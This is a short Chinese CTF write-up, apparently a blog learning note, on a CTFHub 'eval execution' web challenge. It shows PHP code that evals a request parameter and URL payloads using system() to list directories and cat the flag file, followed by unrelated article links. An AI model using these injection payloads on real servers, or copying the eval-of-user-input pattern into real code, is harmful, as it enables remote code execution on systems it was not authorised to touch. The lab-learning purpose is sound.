CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
深蓝海拓7 小时前
用HSL颜色系统改造qdarkstyle样式表库
前端·笔记·python·qt·学习
嵌入式小企鹅7 小时前
大模型算法工程师面试宝典
人工智能·学习·算法·面试·职场和发展·大模型·面经
-To be number.wan7 小时前
操作系统 | 关于时间片大小的确定问题
学习·操作系统
阿荻在肝了7 小时前
Agent学习八:LangGraph学习-小结
python·学习·agent
冻感糕人~8 小时前
大模型面试干货:小白程序员如何准备,轻松拿下高薪Offer?收藏这份独家秘籍!
java·人工智能·学习·ai·面试·职场和发展·大模型学习
陌路208 小时前
第一行代码--初步学习--Android四大组件-activity1
android·学习
李游Leo10 小时前
TypeScript + React 全栈学习:别只背语法,先把项目链路跑通
学习·react.js·typescript
SH2025091710 小时前
2026适合备考大学生上网课使用的考试季学习辅助工具推荐
学习
蓝桉~MLGT10 小时前
中级软考(软件工程师)常用错题整理
学习·中级软考
_李小白11 小时前
【android opencv学习笔记】Day 9: 颜色检测算法
android·opencv·学习
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法04零基础教你claude code 接入 deepseek V405Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南06CC-Switch & Claude 基于 Linux 服务器安装使用指南07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08CVE-2026-31431 (Copy Fail) 漏洞复现与验证记录092026 年 AI 辅助编程工具全景对比:Copilot、Cursor、Claude Code 与 Codex 深度解析10Dirtyfrag漏洞:我花了一下午搞清楚这个Linux内核提权漏洞到底在搞什么